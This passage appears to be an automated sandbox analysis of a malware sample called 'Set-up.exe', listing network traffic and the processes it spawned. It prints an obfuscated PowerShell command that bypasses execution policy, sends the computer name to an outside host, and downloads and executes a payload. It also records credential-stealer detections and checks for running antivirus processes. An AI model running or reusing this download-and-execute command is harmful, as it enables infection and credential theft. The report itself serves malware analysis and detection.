                                                                                                                                                2024-12-30 17:13:19 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49720 | 104.21.37.128 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:20 UTC | 206 | OUT | GET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Host: klipvumisui.shop
2024-12-30 17:13:21 UTC | 904 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:21 GMT
                                                                                                                                                Content-Type: text/plain
                                                                                                                                                Content-Length: 8767044
                                                                                                                                                Connection: close
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5zlGwXrL4fkONudPOO%2FNYsBUrQrr4Yko%2FNqZ%2F0Dnv0WdAkqtoE16BRtGzy%2Fe8TIuG042avIEZz8IKS%2FA189h3geEVmt7AAMtUpQKPsjUhqjTqr96N3EfFi8BuDyjb6ZyRlSk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8f16b0a32d3-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1801&rtt_var=900&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4272&recv_bytes=820&delivery_rate=117965&cwnd=146&unsent_bytes=0&cid=7d5f8a8016836336&ts=468&x=0"
                                                                                                                                                2024-12-30 17:13:21 UTC465INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonit
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d
                                                                                                                                                Data Ascii: rConstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72
                                                                                                                                                Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUStr
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4
                                                                                                                                                Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@C
                                                                                                                                                2024-12-30 17:13:21 UTC1369INData Raw: 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04
                                                                                                                                                Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(J



                                                                                                                                                Target ID:0
                                                                                                                                                Start time:12:12:58
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:75'269'806 bytes
                                                                                                                                                MD5 hash:B92EE6AFF573D5F6AEC1CFD748FE3CCB
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173757711.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2174288204.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:12:13:19
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x
                                                                                                                                                Imagebase:0x570000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:12:13:19
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:12:13:27
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe"
                                                                                                                                                Imagebase:0xbb0000
                                                                                                                                                File size:8'767'044 bytes
                                                                                                                                                MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 39%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:12:13:29
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$80070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe"
                                                                                                                                                Imagebase:0x1b0000
                                                                                                                                                File size:3'367'424 bytes
                                                                                                                                                MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:12:13:30
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT
                                                                                                                                                Imagebase:0xbb0000
                                                                                                                                                File size:8'767'044 bytes
                                                                                                                                                MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:12:13:30
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$90070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT
                                                                                                                                                Imagebase:0x270000
                                                                                                                                                File size:3'367'424 bytes
                                                                                                                                                MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:12:14:00
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"timeout" 9
                                                                                                                                                Imagebase:0x7ff7fda30000
                                                                                                                                                File size:32'768 bytes
                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:12:14:00
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:14
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "wrsa.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:16
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:17
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:18
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:19
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "opssvc.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:20
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "avastui.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:12:14:10
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff6a5670000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:27
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "avgui.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
